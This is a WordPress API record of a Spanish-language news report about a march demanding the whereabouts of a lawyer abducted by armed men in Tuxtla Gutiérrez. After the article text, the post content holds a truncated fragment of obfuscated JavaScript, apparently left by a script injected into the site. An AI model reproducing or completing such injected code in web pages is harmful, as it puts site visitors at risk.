{"id":6412,"date":"2022-11-07T00:37:05","date_gmt":"2022-11-07T00:37:05","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=6412"},"modified":"2022-11-07T00:37:06","modified_gmt":"2022-11-07T00:37:06","slug":"exigen-dar-con-el-paradero-de-abogado-que-fue-levantado-en-plaza-cristal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=6412","title":{"rendered":"Exigen dar con el paradero de abogado que fue levantado en Plaza Cristal"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"765\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/IMG-20221106-WA0013-1024x765.jpg\" alt=\"\" class=\"wp-image-6413\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/IMG-20221106-WA0013-1024x765.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/IMG-20221106-WA0013-300x224.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/IMG-20221106-WA0013-768x574.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/IMG-20221106-WA0013-1536x1148.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/IMG-20221106-WA0013.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><br>Rodolfo Flores.<br>Agencia ReporteCiudadano, 6 de noviembre del 2022. Tuxtla Guti\u00e9rrez.- Familiares, amigos y conocidos de Mauricio Alejandro Cruz Avenda\u00f1o, el abogado que fue levantado el pasado viernes por hombres armados en el estacionamiento del nivel superior de Plaza Cristal, realizaron una marcha para pedir dar con su paradero.<br>El grupo y la caravana de autom\u00f3viles parti\u00f3 desde las afueras del Tecnol\u00f3gico Regional de Tuxtla, en direcci\u00f3n al parque Central, en donde gritaron consignas para exigir a las autoridades que busquen al empresario dedicado al transporte.<br>Durante la protesta realizada en el centro de Tuxtla Guti\u00e9rrez, precisaron que no se tiene sospecha de alguien o algo que haya motivado para que el joven haya sido llevado.<br>Recordaron que, los hombres que lo llevaron iban armados, y se mov\u00edan a bordo de una camioneta de color gris.<br>\u201cNo podemos se\u00f1alar a alguien, lo que pedimos es que aparezca, que lo localicen, que las autoridades hagan su trabajo, estamos desesperados\u201d, expresaron.<br>Hasta este momento no se tienen noticias del paradero de Mauricio, tampoco las autoridades han emitido informaci\u00f3n al respecto.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Rodolfo Flores.Agencia ReporteCiudadano, 6 de noviembre del 2022. Tuxtla Guti\u00e9rrez.- Familiares, amigos y conocidos de Mauricio Alejandro Cruz Avenda\u00f1o, el abogado que fue levantado el pasado viernes por hombres armados en el estacionamiento del nivel superior de Plaza Cristal, realizaron una marcha para pedir dar con su paradero.El grupo y la caravana de autom\u00f3viles parti\u00f3 &hellip;<\/p>\n","protected":false},"author":2,"featured_media":6413,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-6412","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6412","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6412"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6412\/revisions"}],"predecessor-version":[{"id":6414,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6412\/revisions\/6414"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/6413"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6412"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6412"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6412"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}